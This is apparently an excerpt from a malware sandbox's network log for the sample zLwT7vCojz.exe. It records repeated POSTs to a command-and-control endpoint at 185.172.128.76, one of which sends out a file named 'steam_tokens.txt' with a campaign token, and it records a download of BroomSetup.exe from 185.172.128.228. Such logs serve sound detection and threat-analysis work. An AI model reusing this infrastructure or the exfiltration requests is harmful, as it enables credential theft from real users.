                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:37.925054073 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:37.931802034 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:38.261683941 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:38.318516016 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:38.653553963 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:38.658626080 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:38.987281084 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:38.997263908 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCF
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:39.324538946 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:39.329849958 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:39.659713030 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:39.664989948 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJE
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:39.994786024 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:40.000144005 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCF
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:40.331213951 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:40.356164932 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJE
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:40.685098886 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:40.719579935 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJ
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1759
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:41.049690962 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:40 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:41.403948069 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:41.731743097 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:41 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:43.287869930 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHD
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:43.617410898 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:43.626724958 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGI
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:43.956629992 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:43.964041948 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:44.291290045 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:44.303559065 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:44.635534048 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:44.641204119 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:44.972420931 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:44.987664938 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:45.320225954 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:45.340244055 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJE
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:45.673554897 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:45.682318926 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:46.013861895 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:45 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:46.019361973 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAK
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:46.347203016 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:46.352756977 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:46.686954975 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:46.695343018 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBA
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:47.030160904 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:47.036689043 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKEC
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:47.370089054 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:47.396636963 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IIJJDGHJKKJEBFHJDBGH
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:47.723678112 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:47.747114897 CEST564OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="file"------IEBFHCAKFBGDHIDHIDBK--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:48.077455044 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:48.184870005 CEST204OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJ
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 148851
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:48.876805067 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:48.913013935 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 31 38 31 38 31 36 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="message"1818166------EHJKJDGCGDAKFHIDBGCB--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:49.242937088 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:49 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.749704185.172.128.228805496C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.650580883 CEST185OUTGET /BroomSetup.exe HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.228
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851650000 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:16 GMT
                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                            Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
                                                                                                                                                                                                                                            ETag: "4a4030-613b1bf118700"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Content-Length: 4866096
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
